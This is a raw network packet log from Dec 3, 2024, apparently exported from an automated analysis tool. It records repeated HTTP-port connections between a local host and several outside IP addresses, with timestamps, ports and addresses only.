                                                                                                  Dec 3, 2024 09:49:41.598232031 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598237991 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598300934 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598335028 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.598382950 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.598401070 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598409891 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598479986 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.598529100 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.598644972 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.942622900 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942677975 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942728996 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942739010 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942800999 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942853928 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942862034 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942869902 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942878008 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942907095 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.942926884 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942984104 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.942992926 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943001032 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943008900 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943022013 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.943032026 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943089008 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943097115 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943104982 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943116903 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943135977 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.943152905 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.943152905 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.943200111 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.943299055 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.943300009 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.943346977 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.943397045 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.287240028 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287252903 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287308931 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287317038 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287324905 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287388086 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287395954 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287403107 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287468910 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287476063 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.287477016 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287484884 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287496090 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287533045 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287534952 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287544966 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287553072 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287559032 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287592888 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.287592888 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.287698984 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:42.287734985 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.287734985 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.287834883 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.287883997 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.287883997 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:42.759592056 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:43.776108980 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.115267992 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.115489960 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.118864059 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.458066940 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.459743023 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.459841013 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.459849119 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.459855080 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.459863901 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.459918022 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.459999084 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.460006952 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.460014105 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.460021973 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.460048914 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.460191011 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.460238934 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.460297108 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.799210072 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799221039 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799324989 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799335957 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799345016 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799354076 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799429893 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799433947 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.799439907 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799448967 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799457073 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799464941 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799495935 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799539089 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.799637079 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.799691916 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799702883 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799710989 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799717903 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799726009 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799734116 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799741030 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799748898 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:44.799838066 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.799912930 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:44.799912930 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.138750076 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138839960 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138848066 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138855934 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138864994 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138916969 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138925076 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138932943 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138941050 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138948917 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.138997078 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.139004946 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.139035940 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.139036894 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.139036894 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.139043093 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.139049053 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.139075994 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.139075994 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.139193058 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.139193058 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.139241934 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.139290094 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.139377117 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:45.139466047 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.139466047 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.139673948 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.140600920 CET4989680192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:45.481206894 CET804989643.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:50.494981050 CET4989880192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:50.712511063 CET804989831.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:50.712747097 CET4989880192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:50.718355894 CET4989880192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:50.936559916 CET804989831.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:50.950145960 CET804989831.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:50.950155973 CET804989831.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:50.950349092 CET4989880192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:52.226150036 CET4989880192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:53.242471933 CET4989980192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:53.460448027 CET804989931.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:53.460632086 CET4989980192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:53.465356112 CET4989980192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:53.683733940 CET804989931.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:53.683819056 CET804989931.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:53.683828115 CET804989931.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:53.684168100 CET4989980192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:54.976104975 CET4989980192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:55.992072105 CET4990080192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:56.213484049 CET804990031.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:56.213697910 CET4990080192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:56.219490051 CET4990080192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:56.219538927 CET4990080192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:56.441013098 CET804990031.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:56.441366911 CET804990031.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:56.441654921 CET804990031.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:56.465445042 CET804990031.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:56.465454102 CET804990031.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:56.465706110 CET4990080192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:57.724895000 CET4990080192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:58.741843939 CET4990180192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:58.964956999 CET804990131.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:58.965131044 CET4990180192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:58.968054056 CET4990180192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:59.191523075 CET804990131.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:59.191601038 CET804990131.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:59.191608906 CET804990131.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:49:59.191939116 CET4990180192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:59.192961931 CET4990180192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:49:59.416095018 CET804990131.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:04.557348967 CET4990280192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:04.778049946 CET804990231.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:04.778376102 CET4990280192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:04.785099983 CET4990280192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:05.005944014 CET804990231.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:05.006167889 CET804990231.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:05.006285906 CET804990231.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:05.006472111 CET4990280192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:06.301491976 CET4990280192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:07.317645073 CET4990380192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:07.538598061 CET804990331.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:07.538830042 CET4990380192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:07.544234037 CET4990380192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:07.765518904 CET804990331.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:07.793020964 CET804990331.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:07.793030024 CET804990331.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:07.793152094 CET4990380192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:09.050482988 CET4990380192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:10.067425966 CET4990480192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:10.288774014 CET804990431.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:10.289053917 CET4990480192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:10.294321060 CET4990480192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:10.294369936 CET4990480192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:10.515971899 CET804990431.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:10.516041994 CET804990431.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:10.516174078 CET804990431.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:10.535849094 CET804990431.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:10.535857916 CET804990431.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:10.536043882 CET4990480192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:11.799850941 CET4990480192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:12.816390991 CET4990580192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:13.037000895 CET804990531.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:13.037276030 CET4990580192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:13.040489912 CET4990580192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:13.260965109 CET804990531.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:13.261023045 CET804990531.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:13.261130095 CET804990531.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:13.261399031 CET4990580192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:13.262403011 CET4990580192.168.11.3031.31.196.17
                                                                                                  Dec 3, 2024 09:50:13.482270002 CET804990531.31.196.17192.168.11.30
                                                                                                  Dec 3, 2024 09:50:18.389833927 CET4990680192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:18.492366076 CET8049906172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:18.492500067 CET4990680192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:18.497157097 CET4990680192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:18.599661112 CET8049906172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:18.670939922 CET8049906172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:18.670948982 CET8049906172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:18.671013117 CET8049906172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:18.671130896 CET8049906172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:18.671176910 CET4990680192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:18.671366930 CET4990680192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:20.001641989 CET4990680192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:21.018006086 CET4990780192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:21.121073961 CET8049907172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:21.121303082 CET4990780192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:21.127060890 CET4990780192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:21.230019093 CET8049907172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:21.299427032 CET8049907172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:21.299442053 CET8049907172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:21.299448013 CET8049907172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:21.299721956 CET8049907172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:21.299756050 CET4990780192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:21.299968004 CET4990780192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:22.641248941 CET4990780192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:23.658102989 CET4990880192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:23.761014938 CET8049908172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:23.761492968 CET4990880192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:23.766858101 CET4990880192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:23.767045975 CET4990880192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:23.870014906 CET8049908172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:23.870121956 CET8049908172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:23.939249992 CET8049908172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:23.939269066 CET8049908172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:23.939275026 CET8049908172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:23.939569950 CET8049908172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:23.939659119 CET4990880192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:23.939846992 CET4990880192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:25.281313896 CET4990880192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:26.297785044 CET4990980192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:26.400295019 CET8049909172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:26.400530100 CET4990980192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:26.404134989 CET4990980192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:26.506618977 CET8049909172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:26.571535110 CET8049909172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:26.571547031 CET8049909172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:26.571587086 CET8049909172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:26.571593046 CET8049909172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:26.571805000 CET4990980192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:26.571897030 CET4990980192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:26.571974039 CET8049909172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:26.572206020 CET4990980192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:26.572962046 CET4990980192.168.11.30172.67.159.24
                                                                                                  Dec 3, 2024 09:50:26.675347090 CET8049909172.67.159.24192.168.11.30
                                                                                                  Dec 3, 2024 09:50:31.829957962 CET4991080192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:31.997945070 CET8049910103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:31.998198986 CET4991080192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:32.003576040 CET4991080192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:32.192991018 CET8049910103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:32.193001032 CET8049910103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:32.193193913 CET4991080192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:33.514067888 CET4991080192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:34.530694008 CET4991180192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:34.698692083 CET8049911103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:34.698865891 CET4991180192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:34.705077887 CET4991180192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:34.878068924 CET8049911103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:34.878079891 CET8049911103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:34.878242016 CET4991180192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:36.216464043 CET4991180192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:37.232883930 CET4991280192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:37.401207924 CET8049912103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:37.401561975 CET4991280192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:37.406683922 CET4991280192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:37.406744957 CET4991280192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:37.580037117 CET8049912103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:37.585685015 CET8049912103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:37.585694075 CET8049912103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:37.585879087 CET4991280192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:38.920274973 CET4991280192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:39.935180902 CET4991380192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:40.103107929 CET8049913103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:40.103260040 CET4991380192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:40.107511997 CET4991380192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:40.292598963 CET8049913103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:40.292608976 CET8049913103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:40.292617083 CET8049913103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:40.292985916 CET4991380192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:40.293874025 CET4991380192.168.11.30103.224.182.242
                                                                                                  Dec 3, 2024 09:50:40.461644888 CET8049913103.224.182.242192.168.11.30
                                                                                                  Dec 3, 2024 09:50:45.449071884 CET4991480192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:45.660785913 CET804991484.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:45.661003113 CET4991480192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:45.666235924 CET4991480192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:45.877532005 CET804991484.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:45.877996922 CET804991484.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:48.200506926 CET4991580192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:48.412337065 CET804991584.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:48.412637949 CET4991580192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:48.418225050 CET4991580192.168.11.3084.32.84.32
                                                                                                  Dec 3, 2024 09:50:48.629329920 CET804991584.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:48.629600048 CET804991584.32.84.32192.168.11.30
                                                                                                  Dec 3, 2024 09:50:50.961458921 CET4991680192.168.11.3084.32.84.32
